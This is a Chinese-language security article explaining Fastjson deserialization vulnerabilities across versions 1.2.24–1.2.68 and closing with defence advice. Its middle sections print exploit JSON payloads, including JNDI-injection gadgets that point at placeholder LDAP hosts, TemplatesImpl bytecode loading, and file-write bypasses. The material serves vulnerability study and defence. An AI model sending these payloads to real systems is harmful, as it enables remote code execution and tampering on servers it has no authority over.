Fastjson反序列化漏洞深度解析与防御指南<\/h1>

一、Fastjson基础与漏洞原理<\/h2>

1.1 Fastjson基础机制<\/h3>

Fastjson是阿里巴巴开源的Java JSON处理库，其核心功能包括：<\/p>

序列化<\/strong>：JSON.toJSONString()<\/code>，可通过SerializerFeature.WriteClassName<\/code>选项在JSON中加入@type<\/code>字段<\/li>

反序列化<\/strong>：JSON.parse()<\/code>和JSON.parseObject()<\/code>，当存在@type<\/code>时会尝试反序列化为指定类对象<\/li> <\/ul> AutoType机制<\/strong>：Fastjson的核心特性，能根据@type<\/code>自动反序列化成具体类对象，这也是多数漏洞的根源。<\/p> 1.2 漏洞基本原理<\/h3> Fastjson反序列化时，会执行目标类的：<\/p> 构造函数<\/li> getter方法<\/li> setter方法<\/li> is方法<\/li> <\/ol> 当这些方法中存在危险操作时，攻击者通过构造恶意序列化数据即可触发漏洞。<\/p> 二、各版本漏洞详解<\/h2> 2.1 Fastjson ≤1.2.24 (无AutoType限制)<\/h3> 漏洞点<\/strong>：默认使用@type<\/code>指定任意类，无任何过滤机制。<\/p> 利用方式<\/strong>：<\/p> String json =<\/span> "{\"@type\":\"FastjsonDemo.fastJsonDemo1.Student\",\"age\":18,\"name\":\"5wimming\"}"<\/span>;<\/span> <\/span><\/span>Student student =<\/span> JSON.<\/span>parseObject<\/span>(<\/span>json,<\/span> Student.<\/span>class<\/span>,<\/span> Feature.<\/span>SupportNonPublicField<\/span>);<\/span> <\/span><\/span><\/code><\/pre>典型攻击链<\/strong>：<\/p> TemplatesImpl链<\/strong>：<\/p> 利用com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl<\/code><\/li> 通过_bytecodes<\/code>加载恶意字节码<\/li> 要求父类为AbstractTranslet<\/code><\/li> 最终通过newInstance()<\/code>实例化<\/li> <\/ul> <\/li> JdbcRowSetImpl链<\/strong>：<\/p> 利用com.sun.rowset.JdbcRowSetImpl<\/code><\/li> 通过setAutoCommit()<\/code>触发JNDI注入<\/li> 控制dataSourceName<\/code>实现RCE<\/li> <\/ul> <\/li> <\/ol> 2.2 Fastjson 1.2.25-1.2.41 (AutoType机制绕过)<\/h3> 防御机制<\/strong>：<\/p> 引入checkAutoType<\/code>安全机制<\/li> 默认关闭autoTypeSupport<\/code><\/li> 设置黑名单(denyList<\/code>)和白名单(acceptList<\/code>)<\/li> <\/ul> 绕过方式<\/strong>：<\/p> 开启autoType<\/code>后，通过类描述符绕过： { <\/span><\/span> "@type"<\/span>:"[com.sun.rowset.JdbcRowSetImpl;"<\/span>, <\/span><\/span> "dataSourceName"<\/span>:"ldap:\/\/127.0.0.1:1234\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>:true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 2.3 Fastjson 1.2.42-1.2.43 (二次绕过)<\/h3> 防御改进<\/strong>：<\/p> 增加对类描述符的检测<\/li> 引入Hash校验黑名单<\/li> <\/ul> 新绕过方式<\/strong>：<\/p> 使用双类描述符： { <\/span><\/span> "@type"<\/span>:"LLcom.sun.rowset.JdbcRowSetImpl;;"<\/span>, <\/span><\/span> "dataSourceName"<\/span>:"ldap:\/\/127.0.0.1:1234\/Exploit"<\/span>, <\/span><\/span> "autoCommit"<\/span>:true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> 1.2.43中还可使用[<\/code>字符绕过<\/li> <\/ul> 2.4 Fastjson 1.2.44-1.2.47 (关键漏洞)<\/h3> 1.2.44<\/strong>：基本修复了之前的绕过方式<\/p> 1.2.45<\/strong>：黑名单绕过<\/p> 利用org.apache.ibatis.datasource.jndi.JndiDataSourceFactory<\/code><\/li> 需要目标存在mybatis 3.x.x~3.5.0的jar包<\/li> <\/ul> 1.2.47<\/strong>：严重漏洞，无需开启autoTypeSupport<\/p> 利用TypeUtils.getClassFromMapping<\/code>缓存机制<\/li> 通过Class.class<\/code>提前加载恶意类名到mappings中<\/li> 完整攻击链：通过parser.parseObject<\/code>解析JSON<\/li> 绕过AutoTypeSupport<\/code>检测<\/li> 设置resolveStatus<\/code>为TypeNameRedirect<\/code><\/li> 通过MiscCodec.deserialze()<\/code>处理class类型<\/li> 恶意类被缓存到mappings中<\/li> 二次请求实现反序列化<\/li> <\/ol> <\/li> <\/ul> 2.5 Fastjson 1.2.48-1.2.68 (后续绕过)<\/h3> 1.2.48修复<\/strong>：<\/p> 设置MiscCodec<\/code>处理Class类时cache=false<\/code><\/li> loadClass<\/code>默认不缓存<\/li> <\/ul> 1.2.68新绕过<\/strong>：<\/p> 利用expectClass<\/code>绕过checkAutoType()<\/code><\/li> 使用Throwable<\/code>和AutoCloseable<\/code>子类绕过<\/li> 示例： { <\/span><\/span> "@type"<\/span>: "java.lang.AutoCloseable"<\/span>, <\/span><\/span> "@type"<\/span>: "org.apache.commons.compress.compressors.gzip.GzipCompressorOutputStream"<\/span>, <\/span><\/span> "out"<\/span>: { <\/span><\/span> "@type"<\/span>: "java.io.FileOutputStream"<\/span>, <\/span><\/span> "file"<\/span>: "\/path\/to\/target"<\/span> <\/span><\/span> }, <\/span><\/span> "parameters"<\/span>: { <\/span><\/span> "@type"<\/span>: "org.apache.commons.compress.compressors.gzip.GzipParameters"<\/span>, <\/span><\/span> "filename"<\/span>: "filecontent"<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ul> 三、漏洞利用Payload集合<\/h2> 3.1 常见利用类<\/h3> JdbcRowSetImpl<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>: "com.sun.rowset.JdbcRowSetImpl"<\/span>, <\/span><\/span> "dataSourceName"<\/span>: "ldap:\/\/127.0.0.1:23457\/Command8"<\/span>, <\/span><\/span> "autoCommit"<\/span>: true<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> TemplatesImpl<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>: "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"<\/span>, <\/span><\/span> "_bytecodes"<\/span>: ["yv66vgA...k="<\/span>], <\/span><\/span> '_name':<\/span> 'su18',<\/span> <\/span><\/span> '_tfactory':<\/span> {<\/span>},<\/span> <\/span><\/span> "_outputProperties"<\/span>:<\/span> {} <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre><\/li> JndiDataSourceFactory<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>: "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"<\/span>, <\/span><\/span> "properties"<\/span>: { <\/span><\/span> "data_source"<\/span>: "ldap:\/\/127.0.0.1:23457\/Command8"<\/span> <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> <\/ol> 3.2 其他利用类<\/h3> 文件操作<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>:"java.lang.AutoCloseable"<\/span>, <\/span><\/span> "@type"<\/span>:"java.io.FileWriter"<\/span>, <\/span><\/span> "file"<\/span>:"\/tmp\/nonexist"<\/span>, <\/span><\/span> "append"<\/span>:false<\/span> <\/span><\/span>} <\/span><\/span><\/code><\/pre><\/li> BCEL加载<\/strong>：<\/p> { <\/span><\/span> "@type"<\/span>: "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"<\/span>, <\/span><\/span> "driverClassName"<\/span>: "true"<\/span>, <\/span><\/span> "driverClassLoader"<\/span>: { <\/span><\/span> "@type"<\/span>: "com.sun.org.apache.bcel.internal.util.ClassLoader"<\/span> <\/span><\/span> }, <\/span><\/span> "driverClassName"<\/span>: "<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> \[BCEL \]<\/span><\/p> $l$<\/span>8b$I$A$A$A$A$A$A$<\/span>A...o$V$A$<\/span>A" }<\/p> 3. **HikariCP利用**： ```json { "@type": "com.zaxxer.hikari.HikariConfig", "metricRegistry": "ldap:\/\/127.0.0.1:23457\/Command8" } <\/code><\/pre> 四、防御建议<\/h2> 升级到最新版本<\/strong>：目前安全版本为1.2.83及以上<\/p> <\/li> 安全配置<\/strong>：<\/p> ParserConfig.<\/span>getGlobalInstance<\/span>().<\/span>setSafeMode<\/span>(<\/span>true<\/span>);<\/span> \/\/ 启用安全模式 <\/span><\/span><\/span><\/code><\/pre><\/li> 代码层面防御<\/strong>：<\/p> 禁用SerializerFeature.WriteClassName<\/code><\/li> 避免反序列化不可信数据<\/li> 使用白名单机制<\/li> <\/ul> <\/li> 网络层面<\/strong>：<\/p> 限制出网请求<\/li> 监控异常JNDI请求<\/li> <\/ul> <\/li> 运行时防护<\/strong>：<\/p> 使用SecurityManager<\/li> 监控可疑类加载行为<\/li> <\/ul> <\/li> <\/ol> 五、漏洞分析工具与方法<\/h2> 调试环境搭建<\/strong>：<\/p> <dependency><\/span> <\/span><\/span> <groupId><\/span>com.alibaba<\/groupId><\/span> <\/span><\/span> <artifactId><\/span>fastjson<\/artifactId><\/span> <\/span><\/span> <version><\/span>1.2.24<\/version><\/span> <\/span> <\/span><\/span><\/dependency><\/span> <\/span><\/span><\/code><\/pre><\/li> 关键分析点<\/strong>：<\/p> com.alibaba.fastjson.parser.ParserConfig#checkAutoType<\/code><\/li> TypeUtils#loadClass<\/code><\/li> MiscCodec#deserialze<\/code><\/li> <\/ul> <\/li> 调用链分析技巧<\/strong>：<\/p> 关注getter<\/code>\/setter<\/code>方法中的危险操作<\/li> 跟踪@type<\/code>指定的类加载过程<\/li> 分析黑名单过滤逻辑<\/li> <\/ul> <\/li> <\/ol> 六、总结<\/h2> Fastjson反序列化漏洞的本质在于其AutoType机制和Java反射的结合，攻击者通过精心构造的JSON数据可以触发远程代码执行。从1.2.24到1.2.68，虽然防御机制不断升级，但由于Java生态的复杂性和Fastjson的广泛使用，仍然存在各种绕过方式。<\/p> 防御的关键在于：<\/p> 及时升级到安全版本<\/li> 启用安全模式<\/li> 严格控制反序列化的数据来源<\/li> 加强运行时监控<\/li> <\/ol> 对于开发者而言，理解Fastjson的工作原理和漏洞形成机制，才能更好地规避安全风险，构建安全的Java应用。<\/p>